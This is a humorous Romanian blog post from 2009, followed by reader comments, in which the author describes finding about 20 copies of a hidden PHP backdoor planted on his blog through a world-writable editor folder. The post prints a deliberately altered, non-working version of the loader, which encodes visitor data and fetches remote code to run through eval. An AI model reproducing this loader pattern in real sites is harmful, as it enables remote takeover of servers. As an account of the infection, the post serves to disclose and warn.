Care eşti mă, mişelule?

Mda, se pare că aveam nişte musafiri nepoftiţi pe blog care făceau chindie pe munca mea că deh, aşa i-a învăţat pe ei mama lor. Nu, nu mă refer la oameni ci la nişte programe care încercau să mă hackerească şi care stăteau ascunse mişeleşte prin nişte directore (foldere) încă de când m-au hackerit turcii.

Primesc astăzi un e-mail de la hosting cu următorul conţinut:

Fisierele din site-ul dvs pot fi modificate fara stirea dvs din urmatoarele motive:

1)programatorul site-ului dvs le-a modificat
2)parola care ati setat-o pentru contul de ftp a fost prea simpla si a fost "ghicita" de softurile de scanare, respectiv folosita ulterior pentru a modifica fisierele din site
3)calculatorul dvs , respectiv cel de pe care se face upload la continutul site-ului au fost virusate, virusi care in ultima vreme copiaza parolele si ca urmare incarca continutul malitios direct de pe calculatorul in cauza si/sau parola de ftp este folosita de atacator de pe alte site-uri pentru a modifica fisierele siteului si a insera linkuri malitioase

Ce se poate face?

1)contactati programatorul care se ocupa de site-ul dvs (a nu se confunda cu Ghesi care ofera doar gazduirea)
2) si 3) verificati calculatorul de virusi si troieni posibil instalati, dupa devirusare schimbati toate parolele contului de gazduire: mail, aplicatii din site, ftp, acces panou de control…

Noi suntem in imobiliarele internetului, adica inchiriem proprietati(gazduire), daca cineva este suficient de dibaci sa-si lase usa larg deschisa la apartament, nu vad motivul pentru care ar face scandal la proprietarul cladirii. Proprietarul poate cel mult sa puna un anunt la intrare cu ( "nu lasati apa, gazul si lumina pornite aiurea, si usa e bine sa fie incuiata").

Hopa, îmi spun eu, te pomeneşti că mi-a scăpat ceva care, între timp, s-a şi înmulţit! Aşa că mă apuc să caut, de mână, fişiere de-a-mpulea care nu au ce să caute la mine. Nu pot să vă descriu ce horror (mai ceva decât la Ghost Whisperer), ce thriller şi alte cele m-au apucat subit. Am crezut că ameţesc behăind, nu altceva.

Şi mă uit pe unde stau ascunşi mişeii (vreo 20 de fraţi gemeni). Stăteau ascunşi într-un editor de articole pe care nu-l foloseam şi care avea proprietăţi de scriere la toate fişierele (CHMOD 777) deşi i-am spus să le facă paranoic de sigure (CHMOD 555). Se pare că eu nu aveam dreptul să umblu la ele fiindcă nu eram trecut ca şi proprietar pe ele (CHOWN -je), însă altul, mai şmecher, a reuşit să-şi planteze drojdia la mine-n fundul grădinii. Asta aveam, de vreo 20 de ori (codul este, ca de obicei, modificat, să nu-i vină cuiva idei creţe):

<?
error_reporting(0);
$x=(isset( $_SERVER[ "HTTP_HOST" ])?$_SERVER[ "HTTP_HOST" ]: $HTTP_HOST);
$f=(isset( $_SERVER[ "SERVER_NAME" ])?$_SERVER[ "SERVER_NAME" ]: $SERVER_NAME);
$a=(isset( $_SERVER[ "REQUEST_URI" ])?$_SERVER[ "REQUEST_URI" ]: $REQUEST_URI);
$h=(isset( $_SERVER[ "PHP_SELF" ])?$_SERVER[ "PHP_SELF" ]: $PHP_SELF);
$i=(isset( $_SERVER[ "QUERY_STRING" ])?$_SERVER[ "QUERY_STRING" ]: $QUERY_STRING);
$t=(isset( $_SERVER[ "HTTP_REFERER" ])?$_SERVER[ "HTTP_REFERER" ]: $HTTP_REFERER);
$r=(isset( $_SERVER[ "HTTP_USER_AGENT" ])?$_SERVER[ "HTTP_USER_AGENT" ]: $HTTP_USER_AGENT);
$h=(isset( $_SERVER[ "REMOTE_ADDR" ])?$_SERVER[ "REMOTE_ADDR" ]: $REMOTE_ADDR);
$i=(isset( $_SERVER[ "SCRIPT_FILENAME" ])?$_SERVER[ "SCRIPT_FILENAME" ]: $SCRIPT_FILENAME);
$m=(isset( $_SERVER[ "HTTP_ACCEPT_LANGUAGE" ])?$_SERVER[ "HTTP_ACCEPT_LANGUAGE" ]: $HTTP_ACCEPT_LANGUAGE);
$miu="/?".base64_encode($a)."."
.base64_encode($b)."."
.base64_encode($c)."."
.base64_encode($x)."."
.base64_encode($e)."."
.base64_encode($f)."."
.base64_encode($r)."."
.base64_encode($h).".t."
.base64_encode($n)."."
.base64_encode($j);
$f=base64_decode("blablablabla");
if (basename($c)==basename( $i )&&isset( $_REQUEST["t"] ) &&md5 ($_REQUEST[ "blablablabla"]) == " [blablablabla] ") $f=$_REQUEST["id"];
if(( include( base64_decode( "blablablabla"). $8 . $1)));
else if$r=file_get_contents(base64_decode("blablablabla"). $y . $g)) eval ($h);
else
{
$cu=curl_init( base64_decode( "blablablabla" ). $b . $n);
curl_setopt($rt, CURLOPT_RETURNTRANSFER,1);
$o=curl_exec($ui);
curl_close($po);
eval($4);
};
die();
?>

Acum am dat cu un pic de Flit pe puricii ăştia şi le-am băgat mortul în casă, ca să se înveţe minte. Eh, săracii, s-au îmbolnăvit de deces. Dacă nu-mi spuneau băieţii de la hosting habar n-aveam că se întâmplă ceva.

6 Comentarii

  1. ocsike 15 august 2009 la 17:11 - Raspunde

    In ziua de azi e bine să fi paranoic pe un server…
    Ai un hosting bun de îți spun ca s-a schimbat și levelu de acces pe anumite fișiere…

    • Robin Molnar 15 august 2009 la 19:40 - Raspunde

      😆 Da, am parte de hosting foarte bun. Nu umblă cu fofârlica, fac backupuri, etc etc etc. [url=http://www.robintel.ro/index.php/blog/reclame/hosting-ieftin-i-bun.html]Am şi scris despre asta[/url] şi de asta am şi bannerul pe blog. 😉

  2. xtall 15 august 2009 la 17:36 - Raspunde

    :cheer: eu am blocat userii din anumite tari (china par ex) am obs. ca nu fac altceva decat prostii.
    B) nu faci un review la codul ala cu user-agent din httacces ? 😀 is interesat de nişte chestii, boti etc

    • Robin Molnar 15 august 2009 la 19:40 - Raspunde

      😆 Ok, o să încerc să-l fac chiar din seara asta. 😉

  3. ocsike 15 august 2009 la 19:02 - Raspunde

    Eu am blocat pe server c-am toată Asia… si am blocat clase de IP-uri nu useri… si în curând o să blochez și America pentru o perioada… cu exceptie pe yahoo… dar si la yahoo tot ce inseamnă yahoo.cn este blocat…
    Pt lupta antispam e un volum mare de munca…

    • Robin Molnar 15 august 2009 la 19:41 - Raspunde

      :s Într-adevăr, este mult de luptă împotriva nesimţiţilor. :s

Lasa un raspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *

Vreau să fiu părtaș la faptă. Poți, de asemenea, să fii părtaș și fără martori.

Acest site folosește Akismet pentru a reduce spamul. Află cum sunt procesate datele comentariilor tale.